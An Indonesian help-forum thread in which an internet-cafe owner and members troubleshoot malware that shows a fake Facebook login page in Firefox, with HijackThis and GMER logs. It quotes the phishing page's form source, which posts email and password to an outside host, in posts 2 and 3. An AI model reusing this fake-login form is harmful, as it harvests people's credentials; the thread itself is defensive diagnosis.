1

Topic: Virus facebook web forgery

Ceritanya begini pak, ada client di warnet saya yang terkena gejala virus. Tiap kali membuka www.facebook.com, langsung di redirect ke website lain (tanpa domain, hanya IP Address). Oleh Firefox, website tersebut masuk dalam list web forgery.

Dari komputer yang terinfeksi, pada saat saya melakukan ping ke www.facebook.com, reply-nya dari alamat 69.175.52.199. Padahal dari komputer yang bersih, reply-nya dari alamat 69.63.189.11

Menurut saya, virus ini buatan indonesia. Ini karena meskipun cache-dll dihapus, halaman faceboook yang dibuka berbahasa Indonesia (di komputer lain berbahasa inggris)

Saya sudah coba menginstall PC Media, Smadav, Avira, Ansav, Avast, Malwarebytes Anti-Malware, hingga KIS 2011 semua update-an terbaru, tetapi tetap saja gejala itu muncul.

Berikut ini log Hijackthis-nya

---------------------------------------------------------------------------------------------
Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 5:40:27 AM, on 12/17/2010
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP3 (6.00.2900.5512)
Boot mode: Normal

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\Program Files\Faronics\Deep Freeze\Install C-0\DFServ.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe
C:\Program Files\Smadav\SM?RTP.exe
C:\Program Files\Winamp\winampa.exe
C:\Program Files\ClocX\ClocX.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\ccc.exe
C:\WINDOWS\system32\rserver30\RServer3.exe
C:\Program Files\Faronics\Deep Freeze\Install C-0\_$Df\FrzState2k.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\rserver30\FamItrfc.Exe
C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe
C:\WINDOWS\system32\wuauclt.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\WINDOWS\system32\svchost.exe
C:\Documents and Settings\Crocs Net 1\My Documents\Downloads\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = http://www.gamerkraft.com/Loging/GlobeR … aspx?gid=3
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Groove GFS Browser Helper - {72853161-30C5-4D22-B7F9-0BBC1D38A37E} - C:\PROGRA~1\MICROS~2\Office12\GRA8E1~1.DLL
O4 - HKLM\..\Run: [StartCCC] "C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" MSRun
O4 - HKLM\..\Run: [GrooveMonitor] "C:\Program Files\Microsoft Office\Office12\GrooveMonitor.exe"
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [SM?RT-Protection] C:\Program Files\Smadav\SM?RTP.exe rtp
O4 - HKLM\..\Run: [WinampAgent] "C:\Program Files\Winamp\winampa.exe"
O4 - HKLM\..\Run: [ClocX] C:\Program Files\ClocX\ClocX.exe
O4 - HKLM\..\RunServices: [WinSystemLibrary] pwrszr.exe -system
O4 - HKLM\..\RunServices: [LoadWin32Dll] zndll.exe
O4 - HKLM\..\RunServices: [00bppppp] C:\Program Files\Client008\client008.exe
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [Messenger (Yahoo!)] "C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe" -quiet
O8 - Extra context menu item: Add to Google Photos Screensa&ver - res://C:\WINDOWS\system32\GPhotos.scr/200
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\Office12\EXCEL.EXE/3000
O9 - Extra button: Send to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra 'Tools' menuitem: S&end to OneNote - {2670000A-7350-4f3c-8081-5663EE0C6C49} - C:\PROGRA~1\MICROS~2\Office12\ONBttnIE.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\Office12\REFIEBAR.DLL
O9 - Extra button: (no name) - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra 'Tools' menuitem: @xpsp3res.dll,-20001 - {e2e2dd38-d088-4134-82b7-f2ba38496583} - C:\WINDOWS\Network Diagnostic\xpnetdiag.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O18 - Protocol: grooveLocalGWS - {88FED34C-F0CA-4636-A375-3CB6248B04CD} - C:\PROGRA~1\MICROS~2\Office12\GR99D3~1.DLL
O20 - Winlogon Notify: DfLogon - LogonDll.dll (file missing)
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\WINDOWS\system32\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\WINDOWS\system32\browseui.dll
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\system32\Ati2evxx.exe
O23 - Service: DFServ - Faronics Corporation - C:\Program Files\Faronics\Deep Freeze\Install C-0\DFServ.exe
O23 - Service: Google Updater Service (gusvc) - Google - C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
O23 - Service: nProtect GameGuard Service (npggsvc) - Unknown owner - C:\WINDOWS\system32\GameMon.des.exe (file missing)
O23 - Service: Radmin Server V3 (RServer3) - Famatech Corp. - C:\WINDOWS\system32\rserver30\RServer3.exe
O23 - Service: SysqintP - Development - C:\Program Files\Client008\client008.exe

--
End of file - 4833 bytes

---------------------------------------------------------------------------------------------

Screenshot halaman awal
http://img404.imageshack.us/img404/5264/fbhack1.jpg

Screenshot setelah tombol submit ditekan
http://img405.imageshack.us/img405/8449/fbhack2.jpg


Kalau misalnya dibutuhkan, akan saya uploadkan file yang mencurigakan untuk dianalisa.
Mohon bantuannya, dan terima kasih sebelumnya smile

Thumbs up

2

Re: Virus facebook web forgery

Pastinya situs setelah redirect emang berhaya, makanya kena blok. Di Hijackthis ada "open hosts file manager", coba liat dulu isinya ada yg aneh2 atau tidak.

Pas halaman FB (yg redirect ke situs aneh), view page source, aneh apa ga, atau mungkin bisa paste disini. Biasanya sih ada tulisan

<form method="POST" action="http://69.175.52.199/login.php"

smile

3

Re: Virus facebook web forgery

View source-nya

<form method="POST" action="http://see-mywebcam.com/login.php" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)"><input type="hidden" name="charset_test" value="&euro;,&acute;,?,&#180;,&#27700;,?,?" /><input type="hidden" name="lsd" value="rbVns" autocomplete="off" /><input type="hidden" id="locale" name="locale" value="id_ID" autocomplete="off" /><table cellspacing="0"><tr><td class="html7magic"><label for="email">Email</label></td><td class="html7magic"><label for="pass">Kata Sandi</label></td></tr><tr><td><input type="text" class="inputtext" name="email" id="email" tabindex="1" /></td><td><input type="password" class="inputtext" name="pass" id="pass" tabindex="2" /></td><td><label class="uiButton uiButtonConfirm"><input value="Masuk" tabindex="4" type="submit" /></label></td></tr><tr><td class="login_form_label_field"><input type="checkbox" class="inputcheckbox" value="1" id="persistent" name="persistent" tabindex="3" /><input type="hidden" name="default_persistent" value="0" /><label id="label_persistent" for="persistent">Biarkan saya tetap masuk</label></td><td class="login_form_label_field"><a href="http://www.facebook.com/reset.php" rel="nofollow">Lupa kata sandi Anda?</a></td></tr></table><input type="hidden" name="charset_test" value="&euro;,&acute;,?,&#180;,&#27700;,?,?" /><input type="hidden" id="lsd" name="lsd" value="rbVns" autocomplete="off" /></form>

Hasil dari open host hijack

# Copyright (c) 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
#      102.54.94.97     rhino.acme.com          # source server
#       38.25.63.10     x.acme.com              # x client host

127.0.0.1       localhost

Thumbs up

4

Re: Virus facebook web forgery

Cukup unik kalau url yg tampil di browser facebook.com tapi isi halamannya bukan orginal dari facebook. Diperkiran ada malware yg melakukan hooking winsock( recv/gethostbyname dsb) atau klo main dalam bisa di redirect via router dsb. Klo buka facebook pake proxy/site anonymizer harusnya ga kan masuk ke website aneh tsb. Cobain aja kirim samplenya ke pcmedia.

edited:
org indo gan hxxp://who.is/whois/see-mywebcam.com/

Last edited by user (17-12-2010 13:33:04)

5

Re: Virus facebook web forgery

Kira2 file yang dikirim yang mana yah pak? Saya kaga tau file apa yang keinfeksi

Thumbs up

6

Re: Virus facebook web forgery

Pertama pastiin dulu klo url yg dibuka memang facebook.com , coba di browser lain juga. Karena kalau benar url facebook.com dan isinya dari web lain, cukup unik karna cara yg dipake ga mudah, apalagi web see-mywebcam.com itu punya orang indo big_smile , Klo liat log hijackthis sih sepertinya wajar, cuma kalau bener udah main hooking, log hijackthis ga ada gunanya.

Gimana dengan pc lain, apa mengalami hal yg sama juga? Jika yg lain aman, coba ganti pc lain dengan ip pc yg bermasalah. Klo cari solusi ini byk faktor yg mesti dicoba2 dan diperhatikan (apalagi via forum) smile


edited :
coba buka fb via https://www.facebook.com

Last edited by user (17-12-2010 14:48:15)

7

Re: Virus facebook web forgery

Tulisannya sudah saya pastikan benar pak.
www.facebook.com
Makanya saya juga bingung. Kalo di HTTPS error, ga mau masuk.

http://img405.imageshack.us/img405/4337/fbhack3.jpg

Untuk PC-PC laennya, kebetulan lagi dalam mode deepfreeze. Jadi abis direstart bisa masuk facebook semua (tampilan utama bahasa inggris). Cuma dua PC ini aja yang kebetulan lagi saya thawed, n kena. Komputer yang 'sehat' saya coba ganti IP-nya si komputer 'sakit' bisa nyambung FB. Kayaknya faktor virus di komputernya, bukan narget IP.

Aslinya keduanya pengen saya format, cuma sayang kalo belom dilaporin. Kira2 diapain lagi ya pak?

Thumbs up

8

Re: Virus facebook web forgery

itu yg namanya fakelogin.
ngeliat hasil whois tadi, sepertinya saya kenal ama orang yg punya web itu. dulu saya 1 komunitas dengan dia.

saya masih kurang ngerti bagaimana caranya dia me-redirect ke situsnya. setahu saya, daridulu dia memang spesialis fake login dan SocialEngineering, targetnya biasanya chip poker, paypal, or mybe CC.

"If you measured good and evil deeds by current laws, I would be responsible for many crimes." ~ L

9

Re: Virus facebook web forgery

Well, url yang tampil facebook.com dan isinya fake login  cool  Kalau  begini agak ribet menyelusurinya

Pastiin Windows File Protection aktif dan lakukan " sfc /scannow"
kalau mau ribet, matiin semua services non Microsoft dan semua startup, cek apa masih redirect ke url lain. atau coba dianalisa pake antirootkit seperti scan dgn gmer (hxxp://www.gmer.net/)

10

Re: Virus facebook web forgery

sorry software browsing nya apa yaks??  cool

Last edited by RYL Gunners (17-12-2010 20:03:51)

Dapet Virus?? Upload Virusnya ke >> Mohon Pake ZIP/RAR kasih Password: 1 www.pcmav.site40.net
-Do Not Spam.. I Hated It-  Always Standby In ForuM

Thumbs up

11

Re: Virus facebook web forgery

RYL Gunners wrote:

sorry software browsing nya apa yaks??  cool

Firefox. Coba baca lagi di atas  smile

12

Re: Virus facebook web forgery

@user
kepikiran/ingat sebuah teknik untuk redirect web page ga?

jika ada service apache yg jalan di localhost, tekniknya jelas saya tahu. tapi sepertinya ga ada apache yg running. dan perkiraan saya salah.

"If you measured good and evil deeds by current laws, I would be responsible for many crimes." ~ L

13

Re: Virus facebook web forgery

@phrozen, bagi saya pertanyaannya, kenapa url yg muncul di browser facebook.com dan isinya dari web lain? Ada beberapa faktor penyebabbnya, forensiknya ya mesti dicoba dgn antirootkit, tcpview dsb. Sepertinya bukan termasuk hal yg mudah bagi orang awam.

14

Re: Virus facebook web forgery

atau mungkin ada semacam "hooking" yg meredirect www.facebook.com ke fakelogin tsb. entah apakah bisa disebut hooking.

@TS
coba akses facebook dari komputer tsb melalui IP ini : 69.63.181.12 . apa yg muncul?

"If you measured good and evil deeds by current laws, I would be responsible for many crimes." ~ L

15

Re: Virus facebook web forgery

blind337 wrote:

Untuk PC-PC laennya, kebetulan lagi dalam mode deepfreeze. Jadi abis direstart bisa masuk facebook semua (tampilan utama bahasa inggris). Cuma dua PC ini aja yang kebetulan lagi saya thawed, n kena. Komputer yang 'sehat' saya coba ganti IP-nya si komputer 'sakit' bisa nyambung FB. Kayaknya faktor virus di komputernya, bukan narget IP.

Aslinya keduanya pengen saya format, cuma sayang kalo belom dilaporin. Kira2 diapain lagi ya pak?

Kalo ada dua yang kena artinya kan malware nya menular; jadi coba aja pasang flash disk yang kosong, siapa tau bisa ikut ketularan  smile  Terus dikirim deh..
Disini banyak yang gatel pingin utak-atik  big_smile

Kalo gagal; komputer di warnet kan ngga bisa nganggur lama2 Pak  smile  Jadi mendingan cepet aja di-format ulang biar bisa menghasilkan duit..  big_smile

Thumbs up

16

Re: Virus facebook web forgery

sy pny trik yg terlalu sederhana tp boleh dong dicoba ok???

cek time and date kompi na dah betul???
apa anda pernah mengalami kerusakan jaringan pada kompi ini??? jika ya coba install ulang firefox na.
firefox loh... bukan windows boss, ok???

Nothing more than passion

Thumbs up

17

Re: Virus facebook web forgery

@TS udah coba pake SOftware Browsing Laen gak? hasilnya sama ga?

Klow ga bisa juga Ganti Winsock pada System32 .. copy dari PC laen...

ane dah coba bisa di copy paste itu winsock..

86 over...

Tips laen menyusul nunggu TS jwb

Dapet Virus?? Upload Virusnya ke >> Mohon Pake ZIP/RAR kasih Password: 1 www.pcmav.site40.net
-Do Not Spam.. I Hated It-  Always Standby In ForuM

Thumbs up

18

Re: Virus facebook web forgery

Sekedar pemberitahuan, virusnya tidak selalu muncul. Kadang halaman utama facebook balik lagi ke halaman FB normal (inggris) n bisa dibuat untuk login.

Nah, saya juga udah mencoba membuka dari chrome. Halaman utamanya facebook indonesia. Awalnya saya kira chrome juga kena, tapi barusan saya sadar kalo default installan chrome itu bahasa indonesia. Ternyata chrome ga keinfeksi

Trus saya coba lewat IE6, direfresh berkali2, tetap muncul halaman asli (inggris). Kayaknya redirect itu cuma berlaku di Firefox.

Untuk flashdisk, sedang saya coba mancing pake flashdisk kosong. Kopi delete kopi delete, cuma belom kedetek sesuatu yang mencurigakan.

@hari
Iya pak, ini satu dari  2 komputer yang kena udah saya format. Disisain satu, soalnya saya penasaran juga sama virusnya tongue


@phrozen
Samperin aja bro, tanyain cara ngilanginnya tongue Untuk http://69.63.181.12/ muncul halaman FB biasa. Tapi kalo diklik daftar, keluar halaman ini
http://img593.imageshack.us/img593/5786/fbhack5.jpg



@apel
Time n date normal bro

@user
Untuk Windows File Protection n scannow itu, gw masi bingung caranya gimana bro.
Untuk gmer.net hasilnya begini bro.

http://img602.imageshack.us/img602/7422/fbhack6.jpg

Ini log-nya saya paste juga (sori kalo kepanjangan, kaga nemu fitur spoiler)

GMER 1.0.15.15530 - http://www.gmer.net
Rootkit scan 2010-12-18 15:50:04
Windows 5.1.2600 Service Pack 3 Harddisk0\DR0 -> \Device\Ide\IdeDeviceP2T0L0-5 WDC_WD800JD-00LSA0 rev.06.01D06
Running: x9bxnfqc.exe; Driver: C:\DOCUME~1\CROCS2~1\LOCALS~1\Temp\kftdqpog.sys


---- Kernel code sections - GMER 1.0.15 ----

.text           C:\WINDOWS\system32\DRIVERS\ati2mtag.sys                                                                                                                                            section is writeable [0xF7103000, 0x239517, 0xE8000020]
init            C:\WINDOWS\system32\drivers\monfilt.sys                                                                                                                                             entry point in "init" section [0xAE5B2280]

---- User code sections - GMER 1.0.15 ----

.text           C:\Program Files\Mozilla Firefox\firefox.exe[2928] ntdll.dll!LdrLoadDll                                                                                                             7C9163A3 5 Bytes  JMP 004013F0 C:\Program Files\Mozilla Firefox\firefox.exe (Firefox/Mozilla Corporation)

---- User IAT/EAT - GMER 1.0.15 ----

IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\GDI32.dll [KERNEL32.dll!LoadLibraryExW]                                                                [614AAE77] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\GDI32.dll [KERNEL32.dll!LoadLibraryA]                                                                  [614AADA9] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\GDI32.dll [KERNEL32.dll!GetProcAddress]                                                                [614AA7A3] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\GDI32.dll [KERNEL32.dll!LoadLibraryW]                                                                  [614AADE9] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\USER32.dll [GDI32.dll!GetStockObject]                                                                  [614A9CEC] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\USER32.dll [KERNEL32.dll!LoadLibraryExW]                                                               [614AAE77] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\USER32.dll [KERNEL32.dll!LoadLibraryA]                                                                 [614AADA9] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\USER32.dll [KERNEL32.dll!GetProcAddress]                                                               [614AA7A3] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\USER32.dll [KERNEL32.dll!LoadLibraryW]                                                                 [614AADE9] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHLWAPI.dll [GDI32.dll!GetStockObject]                                                                 [614A9CEC] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHLWAPI.dll [KERNEL32.dll!LoadLibraryExA]                                                              [614AAE29] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHLWAPI.dll [KERNEL32.dll!LoadLibraryExW]                                                              [614AAE77] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHLWAPI.dll [KERNEL32.dll!LoadLibraryW]                                                                [614AADE9] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHLWAPI.dll [KERNEL32.dll!LoadLibraryA]                                                                [614AADA9] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHLWAPI.dll [KERNEL32.dll!GetProcAddress]                                                              [614AA7A3] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!DefWindowProcA]                                                                [614AA3BA] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!DefWindowProcW]                                                                [614AA3BA] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!GetSysColor]                                                                   [614A9C27] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!TrackPopupMenu]                                                                [614A9B56] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHLWAPI.dll [USER32.dll!TrackPopupMenuEx]                                                              [614A9B94] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHELL32.dll [GDI32.dll!GetStockObject]                                                                 [614A9CEC] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHELL32.dll [KERNEL32.dll!LoadLibraryA]                                                                [614AADA9] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHELL32.dll [KERNEL32.dll!LoadLibraryW]                                                                [614AADE9] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHELL32.dll [KERNEL32.dll!GetProcAddress]                                                              [614AA7A3] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHELL32.dll [KERNEL32.dll!LoadLibraryExW]                                                              [614AAE77] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHELL32.dll [KERNEL32.dll!LoadLibraryExA]                                                              [614AAE29] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!AnimateWindow]                                                                 [614A9D87] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!TrackPopupMenuEx]                                                              [614A9B94] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!DefWindowProcA]                                                                [614AA3BA] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetSysColor]                                                                   [614A9C27] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!DefWindowProcW]                                                                [614AA3BA] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!GetSysColorBrush]                                                              [614A9CF2] C:\Program Files\Yahoo!\Messenger\yui.dll
IAT             C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe[2504] @ C:\WINDOWS\system32\SHELL32.dll [USER32.dll!TrackPopupMenu]                                                                [614A9B56] C:\Program Files\Yahoo!\Messenger\yui.dll

---- Devices - GMER 1.0.15 ----

AttachedDevice  \Driver\Ftdisk \Device\HarddiskVolume1                                                                                                                                              DeepFrz.sys (Deep Freeze 6.61 driver/Faronics Corporation)
AttachedDevice  \Driver\Ftdisk \Device\HarddiskVolume1                                                                                                                                              ntoskrnl.exe (NT Kernel & System/Microsoft Corporation)
AttachedDevice  \Driver\Ftdisk \Device\HarddiskVolume2                                                                                                                                              DeepFrz.sys (Deep Freeze 6.61 driver/Faronics Corporation)
AttachedDevice  \Driver\Ftdisk \Device\HarddiskVolume2                                                                                                                                              ntoskrnl.exe (NT Kernel & System/Microsoft Corporation)
AttachedDevice  \Driver\Ftdisk \Device\HarddiskVolume3                                                                                                                                              DeepFrz.sys (Deep Freeze 6.61 driver/Faronics Corporation)
AttachedDevice  \Driver\Ftdisk \Device\HarddiskVolume3                                                                                                                                              ntoskrnl.exe (NT Kernel & System/Microsoft Corporation)
---- Processes - GMER 1.0.15 ----

Library         C:\Program (*** hidden *** ) @ C:\Program [184]                                                                                                                                     0x00400000                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       

---- Registry - GMER 1.0.15 ----

Reg             HKLM\SYSTEM\CurrentControlSet\Control\Session Manager@PendingFileRenameOperations                                                                                                   \??\C:\DOCUME~1\CROCS2~1\LOCALS~1\Temp\c6d47749a2a6.tmp??\??\C:\DOCUME~1\CROCS2~1\LOCALS~1\Temp\5e29875cf9b6.tmp??\??\C:\DOCUME~1\CROCS2~1\LOCALS~1\Temp\c9538e588810.tmp??\??\C:\DOCUME~1\CROCS2~1\LOCALS~1\Temp\daaa9abc6ad5.tmp??\??\C:\DOCUME~1\CROCS2~1\LOCALS~1\Temp\7aeea0940541.tmp??\??\C:\DOCUME~1\CROCS2~1\LOCALS~1\Temp\69dca3ce1319.tmp??\??\C:\DOCUME~1\CROCS2~1\LOCALS~1\Temp\b401a4dcc65e.tmp??\??\C:\DOCUME~1\CROCS2~1\LOCALS~1\Temp\6d91a5cd0cdd.tmp??\??\C:\DOCUME~1\CROCS2~1\LOCALS~1\Temp\ab65f65f7dff.tmp??\??\C:\DOCUME~1\CROCS2~1\LOCALS~1\Temp\de9704f2fcba.tmp??\??\C:\DOCUME~1\CROCS2~1\LOCALS~1\Temp\db0e0fbbf47a.tmp??\??\C:\DOCUME~1\CROCS2~1\LOCALS~1\Temp\d63e1f8be97a.tmp??\??\C:\DOCUME~1\CROCS2~1\LOCALS~1\Temp\67ac24c693d1.tmp??\??\C:\DOCUME~1\CROCS2~1\LOCALS~1\Temp\b4d426b5453a.tmp??\??\C:\DOCUME~1\CROCS2~1\LOCALS~1\Temp\52fe2ac862fd.tmp??\??\C:\DOCUME~1\CROCS2~1\LOCALS~1\Temp\4f922d106399.tmp??\??\C:\DOCUME~1\CROCS2~1\LOCALS~1\Temp\adc73fc63336.tmp??\??\C:\DOCUME~1\CROCS2~1\LOCALS~1\Temp\3d2d45fc9c1a.tm
Reg             HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\PrefetchParameters@VideoInitTime                                                                            1640
Reg             HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\ESENT@EventMessageFile                                                                                                  C:\WINDOWS\system32\ESENT.dll
Reg             HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\ESENT@CategoryMessageFile                                                                                               C:\WINDOWS\system32\ESENT.dll
Reg             HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Epoch@Epoch                                                                                                                     40
Reg             HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{011394B8-651C-43E4-A5F9-6E2EC369E81C}@LeaseObtainedTime                                                         1292592288
Reg             HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{011394B8-651C-43E4-A5F9-6E2EC369E81C}@T1                                                                        1292721888
Reg             HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{011394B8-651C-43E4-A5F9-6E2EC369E81C}@T2                                                                        1292819088
Reg             HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{011394B8-651C-43E4-A5F9-6E2EC369E81C}@LeaseTerminatesTime                                                       1292851488
Reg             HKLM\SYSTEM\CurrentControlSet\Services\{011394B8-651C-43E4-A5F9-6E2EC369E81C}\Parameters\Tcpip@LeaseObtainedTime                                                                    1292592288
Reg             HKLM\SYSTEM\CurrentControlSet\Services\{011394B8-651C-43E4-A5F9-6E2EC369E81C}\Parameters\Tcpip@T1                                                                                   1292721888
Reg             HKLM\SYSTEM\CurrentControlSet\Services\{011394B8-651C-43E4-A5F9-6E2EC369E81C}\Parameters\Tcpip@T2                                                                                   1292819088
Reg             HKLM\SYSTEM\CurrentControlSet\Services\{011394B8-651C-43E4-A5F9-6E2EC369E81C}\Parameters\Tcpip@LeaseTerminatesTime                                                                  1292851488
Reg             HKLM\SYSTEM\ControlSet002\Control\Session Manager\Memory Management\PrefetchParameters@VideoInitTime                                                                                1640
Reg             HKLM\SYSTEM\ControlSet002\Control\Watchdog\Display@ShutdownCount                                                                                                                    10
